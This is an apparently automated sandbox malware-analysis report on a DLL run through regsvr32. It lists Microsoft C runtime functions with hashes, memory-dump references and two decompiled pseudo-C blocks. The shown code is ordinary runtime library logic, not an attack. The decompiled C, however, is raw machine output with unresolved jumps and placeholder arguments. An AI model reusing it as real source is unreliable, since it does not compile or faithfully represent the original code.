                                                      • Instruction ID: aea6e50ad225ee654e5ba897f2371f9ab8692fab447ee5272478533351973a17
                                                      • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                      • Instruction Fuzzy Hash: 69214C72A2D64286EB909F58E84476EB7E0F380394F605125E6CE47AE4CBBED444CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2C170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_
                                                      • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                      • API String ID: 1901436342-3621827421
                                                      • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                      • Instruction ID: b6da7cfe51097e189ae1413993ad3b1820e6f9d9ec5e09c8ec6feaf0c9b902cc
                                                      • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                      • Instruction Fuzzy Hash: 6D210132918A8186E790DB64E8516AEB7E0F7C4780F614122E7CD83AB9DB7DD954CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D32C9F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                      • API String ID: 2123368286-2972513288
                                                      • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                      • Instruction ID: 6381d33894c21e9a570bb340808ef8ba759c91e84b1c9252353dd9e19991e7ba
                                                      • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                      • Instruction Fuzzy Hash: 64211A31E1D242CAE7E08F28EC44B6E72E1F344395F605536A6CA866B4D77EE944CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D32695 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                      • API String ID: 2123368286-367560414
                                                      • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                      • Instruction ID: a1605579a08129191013953cda15cb2ece86ed32ec4905bca1088ce11b277eda
                                                      • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                      • Instruction Fuzzy Hash: EB114931E0C64A89F7E08B14EC457BE62E0F750385F608525D2DD46AF9CBBEE4888F01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D375E9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                      • API String ID: 2123368286-2992382544
                                                      • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                      • Instruction ID: 6b038216fd5801b421c61b74e1935d340daef546a177eff3ea16a7a1b838ed42
                                                      • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                      • Instruction Fuzzy Hash: EE112831A08A86D5E7F08B24EC547BE62D0F388355FA0862581DD826E5CF7ED184CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3AFB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                      • API String ID: 2123368286-3532421942
                                                      • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                      • Instruction ID: a908f33eec800d0b641dcce84a446a4f1bc570cb1104d1739574f535c1af449d
                                                      • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                      • Instruction Fuzzy Hash: 2D115771A2D6468AE7949B54E948B6E73E0F380344F605125F6DD43AA8C7BED508CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D37E4E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                      • API String ID: 2123368286-152112980
                                                      • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                      • Instruction ID: 92758ea50bb160a3fa02acdedbd4276cd578df270f1ec03c6948689f63d256e2
                                                      • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                      • Instruction Fuzzy Hash: B7110331A1CA83C9F7A09B54EC047AEB6E0F340345F604425D6C8466A4CBBEE8888B02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D234D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                      • API String ID: 433497747-929597301
                                                      • Opcode ID: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                      • Instruction ID: a509fa70e7a1a5ff7154c4a485401b757d9bccf253ee3a6eb315a1ba73516cba
                                                      • Opcode Fuzzy Hash: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                      • Instruction Fuzzy Hash: 25012D21A2C64282F3D09B65EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018A01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3206A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-3131718208
                                                      • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                      • Instruction ID: 5c692777b4ebe1842fa8b4633668c7a74dcbf255a9000a4830a35d89f8dfec26
                                                      • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                      • Instruction Fuzzy Hash: 64113571E086469AF7A08B28ED047BE62E0F344708F608225A7EC076F5D77EE548CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D31FCB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-1927795013
                                                      • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                      • Instruction ID: 0384ac4a385dd8b2ed67f657b87bd2987707cc06f4fd1891b24df9f5e25f1ad6
                                                      • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                      • Instruction Fuzzy Hash: D7010832E0C646D6F7A08B68EC057AD66D0B380354F704225A69C066F9DB7EE585CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D25A25 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                      • API String ID: 2123368286-563024394
                                                      • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                      • Instruction ID: fd38c362069ef75f6546e890191a2209ff1da2573c153e25103ddfba7490d183
                                                      • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                      • Instruction Fuzzy Hash: EA011A3190964A86EBA09F14EC417AE32E0F355328FA14226D29C466E4DB7FE545CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D325F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                      • API String ID: 2123368286-577066449
                                                      • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                      • Instruction ID: 02d1b78a9e545c30370c255a3c9a69dd209a03738a12318584891449022be9b6
                                                      • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                      • Instruction Fuzzy Hash: 8F017831E0C64ACAF7E08B54EC847AD26E0F794394FB09535A6DD466F8CB7EE5448B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D27490 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 1646373207-1276376045
                                                      • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                      • Instruction ID: 7d77de13c6c7ff31230b68e177806ee2c45e09dad43843c6dfa61805c8a48305
                                                      • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                      • Instruction Fuzzy Hash: 97F0AC32918A4282D674DB18F94836DB7F0F388348F644125D6CE42678DF3ED559CA04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D40C80 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 41%
                                                      			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
				signed long long _v16;
				long _v24;
				void* _t57;
				signed long long _t59;

				_t57 = __rax;
				_a8 = __ecx;
				E000007FE7FEF9D3F900(_a8);
				if (_t57 == 0xffffffff) goto 0xf9d40d05;
				if (_a8 != 1) goto 0xf9d40cb3;
				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
				if (_a8 != 2) goto 0xf9d40cef;
				_t59 =  *0xf9d4e560;
				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
				E000007FE7FEF9D3F900(1);
				_v16 = _t59;
				E000007FE7FEF9D3F900(2);
				if (_v16 == _t59) goto 0xf9d40d05;
				E000007FE7FEF9D3F900(_a8);
				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
				_v24 = 0;
				goto 0xf9d40d19;
				_v24 = GetLastError();
				E000007FE7FEF9D3F7D0(_a8, _t59);
				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
				if (_v24 == 0) goto 0xf9d40d60;
				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
				goto 0xf9d40d62;
				return 0;
			}







                                                      0x7fef9d40c80
                                                      0x7fef9d40c80
                                                      0x7fef9d40c8c
                                                      0x7fef9d40c95
                                                      0x7fef9d40c9c
                                                      0x7fef9d40cb1
                                                      0x7fef9d40cb8
                                                      0x7fef9d40cba
                                                      0x7fef9d40cca
                                                      0x7fef9d40cd1
                                                      0x7fef9d40cd6
                                                      0x7fef9d40ce0
                                                      0x7fef9d40ced
                                                      0x7fef9d40cf3
                                                      0x7fef9d40d03
                                                      0x7fef9d40d05
                                                      0x7fef9d40d0d
                                                      0x7fef9d40d15
                                                      0x7fef9d40d1d
                                                      0x7fef9d40d44
                                                      0x7fef9d40d4e
                                                      0x7fef9d40d54
                                                      0x7fef9d40d5e
                                                      0x7fef9d40d66

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                      • String ID:
                                                      • API String ID: 1551955814-0
                                                      • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                      • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                                      • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                      • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D21000 Relevance: 6.0, APIs: 4, Instructions: 47threadtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: FormatLocaleThread$DateTime
                                                      • String ID:
                                                      • API String ID: 3587784874-0
                                                      • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                      • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                                      • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                      • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2A5E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 23%
                                                      			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
				signed int _v24;
				char _v42;
				void* _v48;
				signed int _v56;
				char _v312;
				signed char* _v328;
				char _v584;
				char _v840;
				char _v1352;
				char _v1384;
				char _v1392;
				intOrPtr _v1400;
				long long _v1408;
				long long _v1416;
				signed long long _t206;
				signed char* _t214;
				signed long long _t223;
				intOrPtr _t225;
				intOrPtr _t226;
				signed long long _t233;

				_t224 = __rcx;
				_a8 = __rcx;
				_t206 =  *0xf9d4b018; // 0x6ec2365e8408
				_v24 = _t206 ^ _t233;
				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
				_v56 = 0;
				goto 0xf9d2a63c;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
				goto 0xf9d2a62c;
				_v312 = 0x20;
				_v328 =  &_v42;
				goto 0xf9d2a68f;
				_v328 =  &(_v328[2]);
				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
				_v56 =  *_v328 & 0x000000ff;
				goto 0xf9d2a6c2;
				_v56 = _v56 + 1;
				_t214 = _v328;
				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
				goto 0xf9d2a6b2;
				goto 0xf9d2a67b;
				_v1392 = 0;
				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
				_v1408 =  *((intOrPtr*)(_a8 + 4));
				_v1416 =  &_v1352;
				r9d = 0x100;
				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v840;
				_v1416 = 0x100;
				r8d = 0x100;
				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v584;
				_v1416 = 0x100;
				r8d = 0x200;
				_t223 = _a8;
				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
				_v56 = 0;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
				_t225 = _a8;
				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
				goto 0xf9d2a8fc;
				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
				_t226 = _a8;
				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
				goto 0xf9d2a8fc;
				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
				goto L1;
				goto 0xf9d2aa20;
				_v56 = 0;
				_v56 = _v56 + 1;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
				_v56 = _v56 + 1;
				__rdx = _a8;
